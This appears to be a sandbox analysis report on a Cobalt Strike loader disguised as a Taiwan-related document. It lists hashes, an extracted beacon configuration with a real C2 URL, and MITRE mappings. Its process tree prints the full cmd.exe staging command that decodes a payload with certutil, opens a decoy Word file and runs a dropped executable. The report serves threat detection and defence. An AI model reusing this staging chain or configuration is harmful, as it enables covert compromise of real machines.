cobaltstrike | 6306b20b4b3fc089a7fd0e0b15ea52da879da95463d247d4f0a698207eda2718

General

Target

China's_gray-zone_warfare_against_Taiwan/__MACOS/_params.cat.js
Size

1.4MB
MD5

83be472a5402d0b32e40cc6d761a8a37
SHA1

e44732160aae29881342dfde89db0fe9aa984f7f
SHA256

434517ef2e12af66ef97b740e4caf9b07a73f1321bf013b6ee6dd0d180804409
SHA512

0c490221d52f7460608cb85be047aa36337ca5c1e6b0de39b870ef41dab23a96eef36e05a400e1848c6136e9d34f4c3f1a72dd390c80798d9bb3148cf3271c0d
SSDEEP

24576:lWGkPK8x3nD7v6hfaMk4HY7rlho/S28f2HCQbuNc0W1w/HiELEVZ7110Yy36ht6Y:/

Score

10^/10

cobaltstrike 100000000 backdoor trojan

Malware Config

Extracted

Family

cobaltstrike

Botnet

100000000

C2

http://upserver.updateservice.store:443/common.html

Attributes

access_type
512
beacon_type
2048
host
upserver.updateservice.store,/common.html
http_header1
AAAAEAAAACJIb3N0OiB1cHNlcnZlci51cGRhdGVzZXJ2aWNlLnN0b3JlAAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAcAAAAAAAAACwAAAAMAAAACAAAAA2x1PQAAAAYAAAAGQ29va2llAAAACQAAAAt2ZXJpZnk9dHJ1ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
http_header2
AAAAEAAAACJIb3N0OiB1cHNlcnZlci51cGRhdGVzZXJ2aWNlLnN0b3JlAAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAoAAAAvQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQAAAAHAAAAAQAAAAMAAAADAAAAAgAAAAhhdXRob3JzPQAAAAQAAAAHAAAAAAAAAAMAAAACAAAADl9fc2Vzc2lvbl9faWQ9AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
http_method1
GET
http_method2
POST
jitter
9472
polling_time
58666
port_number
443
sc_process32
%windir%\syswow64\svchost.exe
sc_process64
%windir%\sysnative\svchost.exe
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCdQ5nVpJ13O9CwiQRtLOdTAwGg6oj4mvtVqZvCbSy9YyU3ngZSDBgmWjSMwrTqMvvKUr5RvigK1N00xTGT4LVtDESUaUvyGU79G24yPaF5rUOJjnAIRazosjB87DvXbI6k45HQsVyZD7wgEXnKFmv3E0Tk9ti5G0eVOKL5tqdS5QIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown1
6.1158912e+08
unknown2
AAAABAAAAAIAAAJYAAAAAwAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
uri
/r-arrow
user_agent
Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; RM-1152) AppleWebKit/537.36 (KHTML, like Gecko)
watermark
100000000

Signatures

Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation cmd.exe
Executes dropped EXE 1 IoCs

Processes:

360se.exe

pid process

3048 360se.exe
Loads dropped DLL 1 IoCs

Processes:

360se.exe

pid process

3048 360se.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	cmd.exe

pid	process
3048	360se.exe

pid	process
3048	360se.exe

Drops file in Windows directory 2 IoCs

Processes:

expand.exe

description	ioc	process
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	expand.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings cmd.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

2064 WINWORD.EXE
2064 WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings	cmd.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

WINWORD.EXE

pid	process
2064	WINWORD.EXE
2064	WINWORD.EXE
2064	WINWORD.EXE
2064	WINWORD.EXE
2064	WINWORD.EXE
2064	WINWORD.EXE
2064	WINWORD.EXE
2064	WINWORD.EXE
2064	WINWORD.EXE
2064	WINWORD.EXE
2064	WINWORD.EXE
2064	WINWORD.EXE
2064	WINWORD.EXE
2064	WINWORD.EXE

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 2820 wrote to memory of 1632	2820		cmd.exe
PID 2820 wrote to memory of 1632	2820		cmd.exe
PID 1632 wrote to memory of 2264	1632	cmd.exe	findstr.exe
PID 1632 wrote to memory of 2264	1632	cmd.exe	findstr.exe
PID 1632 wrote to memory of 1940	1632	cmd.exe	certutil.exe
PID 1632 wrote to memory of 1940	1632	cmd.exe	certutil.exe
PID 1632 wrote to memory of 4092	1632	cmd.exe	expand.exe
PID 1632 wrote to memory of 4092	1632	cmd.exe	expand.exe
PID 1632 wrote to memory of 2064	1632	cmd.exe	WINWORD.EXE
PID 1632 wrote to memory of 2064	1632	cmd.exe	WINWORD.EXE
PID 1632 wrote to memory of 3048	1632	cmd.exe	360se.exe
PID 1632 wrote to memory of 3048	1632	cmd.exe	360se.exe
PID 1632 wrote to memory of 3048	1632	cmd.exe	360se.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\China's_gray-zone_warfare_against_Taiwan\__MACOS\_params.cat.js
1⤵
PID:2820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c findstr 4d534346 C:\Users\Admin\AppData\Roaming\lFbRwJ.tmp > C:\Users\Admin\AppData\Roaming\sxytyM.tmp&for /r c:\windows\system32\ %i in (*ertu*.exe) do %i -decodehex C:\Users\Admin\AppData\Roaming\sxytyM.tmp C:\Users\Admin\AppData\Roaming\SfnLzw.tmp&expand -F:* C:\Users\Admin\AppData\Roaming\SfnLzw.tmp C:\Users\Admin\AppData\Roaming\&start C:\Users\Admin\AppData\Roaming\China's_gray-zone_warfare_against_Taiwan.doc&start C:\Users\Admin\AppData\Roaming\360se.exe&del C:\Users\Admin\AppData\Roaming\lFbRwJ.tmp C:\Users\Admin\AppData\Roaming\sxytyM.tmp C:\Users\Admin\AppData\Roaming\SfnLzw.tmp
2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1632

C:\Windows\system32\findstr.exe
findstr 4d534346 C:\Users\Admin\AppData\Roaming\lFbRwJ.tmp
3⤵
PID:2264

\??\c:\windows\system32\certutil.exe
c:\windows\system32\certutil.exe -decodehex C:\Users\Admin\AppData\Roaming\sxytyM.tmp C:\Users\Admin\AppData\Roaming\SfnLzw.tmp
3⤵
PID:1940

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\China's_gray-zone_warfare_against_Taiwan.doc" /o ""
3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2064

C:\Windows\system32\expand.exe
expand -F:* C:\Users\Admin\AppData\Roaming\SfnLzw.tmp C:\Users\Admin\AppData\Roaming\
3⤵
- Drops file in Windows directory
PID:4092

C:\Users\Admin\AppData\Roaming\360se.exe
C:\Users\Admin\AppData\Roaming\360se.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3048

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\lFbRwJ.tmp
Filesize
1024KB

MD5
a8aaf88058de4898468d774bcc39cf47

SHA1
ee28eadfae02def1213b56d87633b3689cebca94

SHA256
c99b999b271f193fcd66c538634a9306065067df01ebdc5d616bacc305414008

SHA512
1c1df33638a23eab90fb80464ccc8b04bc5f87304135b24f1f7beafe2a6c1fa0690e26d85f3de11ce15839b12996372f774391a80e9b4b4dea9ab03c83794afc

Download Submit
C:\Users\Admin\AppData\Roaming\sxytyM.tmp
Filesize
86KB

MD5
3e7df42efc760f0eb36f166dfd421ff7

SHA1
fa7e5a9b294a2e6cae611d68443ba067a377bc28

SHA256
ea15c7cfbb0ecffc7db9896ffab3df6a1128887076c6a389cb34c6983ec0c3ff

SHA512
b6673c282fa92c3cf961ccf2eb5bdf170c6ea14a538c5f652cf3a3deb6926d443af0e31e8f79d388fe93e61d652c73884ec98b404abca0c96819412a3e6a25ce

Download Submit
\??\c:\users\admin\appdata\roaming\sfnlzw.tmp
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2064-31-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-34-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-29-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmp

Filesize
64KB

Download
memory/2064-28-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmp

Filesize
64KB

Download
memory/2064-36-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-39-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-42-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-44-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-43-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-41-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-40-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-38-0x00007FF8D21F0000-0x00007FF8D2200000-memory.dmp

Filesize
64KB

Download
memory/2064-37-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-35-0x00007FF8D21F0000-0x00007FF8D2200000-memory.dmp

Filesize
64KB

Download
memory/2064-33-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-27-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-32-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-26-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmp

Filesize
64KB

Download
memory/2064-30-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-25-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-24-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmp

Filesize
64KB

Download
memory/2064-21-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-20-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmp

Filesize
64KB

Download
memory/2064-108-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmp

Filesize
64KB

Download
memory/2064-109-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmp

Filesize
64KB

Download
memory/2064-111-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmp

Filesize
64KB

Download
memory/2064-87-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-88-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-89-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-110-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmp

Filesize
64KB

Download
memory/2064-113-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-114-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/2064-112-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmp

Filesize
2.0MB

Download
memory/3048-64-0x0000000000EE0000-0x0000000000F68000-memory.dmp

Filesize
544KB

Download
memory/3048-56-0x0000000000D40000-0x0000000000D74000-memory.dmp

Filesize
208KB

Download
memory/3048-57-0x0000000000EE0000-0x0000000000F68000-memory.dmp

Filesize
544KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads